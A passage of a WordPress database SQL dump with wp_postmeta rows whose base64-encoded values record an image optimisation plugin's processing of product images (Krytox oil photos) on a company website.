zXC8yMDE2XC8wOVwva3J5dG94LXBjYS1vaWwtMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9rcnl0b3gtcGNhLW9pbC0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2tyeXRveC1wY2Etb2lsLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcwMzE2LCJpZCI6MTQzNH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9rcnl0b3gtcGNhLW9pbC01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC1wY2Etb2lsLTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwva3J5dG94LXBjYS1vaWwtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzAzMTksImlkIjoxNDM0fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LXBjYS1vaWwtMTE0eDEzMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9rcnl0b3gtcGNhLW9pbC0xMTR4MTMwLmpwZyIsIndpZHRoIjoiMTE0IiwiaGVpZ2h0IjoiMTMwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2tyeXRveC1wY2Etb2lsLTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcwMzIyLCJpZCI6MTQzNH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC1wY2Etb2lsLTE2MHgxNjAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LXBjYS1vaWwtMTYweDE2MC5qcGciLCJ3aWR0aCI6IjE2MCIsImhlaWdodCI6IjE2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9rcnl0b3gtcGNhLW9pbC0xNjB4MTYwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MDMyNSwiaWQiOjE0MzR9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9rcnl0b3gtcGNhLW9pbC0xODB4MTgwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC1wY2Etb2lsLTE4MHgxODAuanBnIiwid2lkdGgiOiIxODAiLCJoZWlnaHQiOiIxODAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwva3J5dG94LXBjYS1vaWwtMTgweDE4MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzAzMjcsImlkIjoxNDM0fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LXBjYS1vaWwtMjQ3eDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9rcnl0b3gtcGNhLW9pbC0yNDd4MzAwLmpwZyIsIndpZHRoIjoiMjQ3IiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2tyeXRveC1wY2Etb2lsLTI0N3gzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcwMzMwLCJpZCI6MTQzNH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC1wY2Etb2lsLTMwMHgzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LXBjYS1vaWwtMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9rcnl0b3gtcGNhLW9pbC0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MDMzMywiaWQiOjE0MzR9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9rcnl0b3gtcGNhLW9pbC00MDB4NDAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC1wY2Etb2lsLTQwMHg0MDAuanBnIiwid2lkdGgiOiI0MDAiLCJoZWlnaHQiOiI0MDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwva3J5dG94LXBjYS1vaWwtNDAweDQwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzAzMzYsImlkIjoxNDM0fV0='); 
INSERT INTO `wp_postmeta` VALUES (29478, 1433, 'wpfc_optimisation_reduction', '16397'); 
INSERT INTO `wp_postmeta` VALUES (29479, 1433, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LXNnLW9pbC5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC1zZy1vaWwuanBnIiwid2lkdGgiOjQ5MTIsImhlaWdodCI6MzEyMywibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU3MDM0MSwiaWQiOiIxNDMzIn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9rcnl0b3gtc2ctb2lsLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LXNnLW9pbC0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2tyeXRveC1zZy1vaWwtMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjY4OSwidGltZSI6MTQ4MzU3MDM0NCwiaWQiOjE0MzN9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LXNnLW9pbC04MDB4NTA5LmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTA5LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC1zZy1vaWwtODAweDUwOS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9rcnl0b3gtc2ctb2lsLTgwMHg1MDkuanBnIiwicmVkdWN0aW9uIjoxNDg0LCJ0aW1lIjoxNDgzNTcwMzQ4LCJpZCI6MTQzM30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9rcnl0b3gtc2ctb2lsLTc2OHg0ODguanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo0ODgsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LXNnLW9pbC03Njh4NDg4LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2tyeXRveC1zZy1vaWwtNzY4eDQ4OC5qcGciLCJyZWR1Y3Rpb24iOjE0MzAsInRpbWUiOjE0ODM1NzAzNTEsImlkIjoxNDMzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC1zZy1vaWwtMTYwMHgxMDE3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwMTcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LXNnLW9pbC0xNjAweDEwMTcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwva3J5dG94LXNnLW9pbC0xNjAweDEwMTcuanBnIiwicmVkdWN0aW9uIjo3MjExLCJ0aW1lIjoxNDgzNTcwMzU2LCJpZCI6MTQzM30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9rcnl0b3gtc2ctb2lsLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LXNnLW9pbC0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2tyeXRveC1zZy1vaWwtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjU2OCwidGltZSI6MTQ4MzU3MDM1OSwiaWQiOjE0MzN9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LXNnLW9pbC0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC1zZy1vaWwtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9rcnl0b3gtc2ctb2lsLTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjo0NjIsInRpbWUiOjE0ODM1NzAzNjIsImlkIjoxNDMzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC1zZy1vaWwtMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9rcnl0b3gtc2ctb2lsLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwva3J5dG94LXNnLW9pbC0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6NTExLCJ0aW1lIjoxNDgzNTcwMzY2LCJpZCI6MTQzM30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9rcnl0b3gtc2ctb2lsLTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LXNnLW9pbC01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2tyeXRveC1zZy1vaWwtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEzNDYsInRpbWUiOjE0ODM1NzAzNjksImlkIjoxNDMzfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LXNnLW9pbC0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC1zZy1vaWwtMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9rcnl0b3gtc2ctb2lsLTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjo0MjcsInRpbWUiOjE0ODM1NzAzNzMsImlkIjoxNDMzfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LXNnLW9pbC0xNjB4MTYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC1zZy1vaWwtMTYweDE2MC5qcGciLCJ3aWR0aCI6IjE2MCIsImhlaWdodCI6IjE2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9rcnl0b3gtc2ctb2lsLTE2MHgxNjAuanBnIiwicmVkdWN0aW9uIjozNzQsInRpbWUiOjE0ODM1NzAzNzYsImlkIjoxNDMzfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LXNnLW9pbC0xODB4MTgwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC1zZy1vaWwtMTgweDE4MC5qcGciLCJ3aWR0aCI6IjE4MCIsImhlaWdodCI6IjE4MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9rcnl0b3gtc2ctb2lsLTE4MHgxODAuanBnIiwicmVkdWN0aW9uIjo0MTAsInRpbWUiOjE0ODM1NzAzNzksImlkIjoxNDMzfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LXNnLW9pbC0yNDd4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC1zZy1vaWwtMjQ3eDMwMC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9rcnl0b3gtc2ctb2lsLTI0N3gzMDAuanBnIiwicmVkdWN0aW9uIjo0NDQsInRpbWUiOjE0ODM1NzAzODMsImlkIjoxNDMzfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LXNnLW9pbC0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC1zZy1vaWwtMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9rcnl0b3gtc2ctb2lsLTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjo0ODQsInRpbWUiOjE0ODM1NzAzODYsImlkIjoxNDMzfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LXNnLW9pbC00MDB4NDAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC1zZy1vaWwtNDAweDQwMC5qcGciLCJ3aWR0aCI6IjQwMCIsImhlaWdodCI6IjQwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9rcnl0b3gtc2ctb2lsLTQwMHg0MDAuanBnIiwicmVkdWN0aW9uIjo1NTcsInRpbWUiOjE0ODM1NzAzOTAsImlkIjoxNDMzfV0='); 
INSERT INTO `wp_postmeta` VALUES (29480, 1430, 'wpfc_optimisation_reduction', '964184'); 
INSERT INTO `wp_postmeta` VALUES (29481, 1430, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LWZsdW9yb2d1YXJkLXBjYS1vaWwuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9rcnl0b3gtZmx1b3JvZ3VhcmQtcGNhLW9pbC5qcGciLCJ3aWR0aCI6MjQ3NSwiaGVpZ2h0IjoxNjUwLCJtaW1lX3R5cGUiOiIiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwva3J5dG94LWZsdW9yb2d1YXJkLXBjYS1vaWwuanBnIiwicmVkdWN0aW9uIjo5NjQxNzAsInRpbWUiOjE0ODM1NzA0MDAsImlkIjoiMTQzMCJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LWZsdW9yb2d1YXJkLXBjYS1vaWwtMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9rcnl0b3gtZmx1b3JvZ3VhcmQtcGNhLW9pbC0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2tyeXRveC1mbHVvcm9ndWFyZC1wY2Etb2lsLTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTcwNDAyLCJpZCI6MTQzMH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9rcnl0b3gtZmx1b3JvZ3VhcmQtcGNhLW9pbC04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC1mbHVvcm9ndWFyZC1wY2Etb2lsLTgwMHg1MzMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwva3J5dG94LWZsdW9yb2d1YXJkLXBjYS1vaWwtODAweDUzMy5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzA0MDUsImlkIjoxNDMwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC1mbHVvcm9ndWFyZC1wY2Etb2lsLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LWZsdW9yb2d1YXJkLXBjYS1vaWwtNzY4eDUxMi5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9rcnl0b3gtZmx1b3JvZ3VhcmQtcGNhLW9pbC03Njh4NTEyLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MDQwOCwiaWQiOjE0MzB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LWZsdW9yb2d1YXJkLXBjYS1vaWwtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LWZsdW9yb2d1YXJkLXBj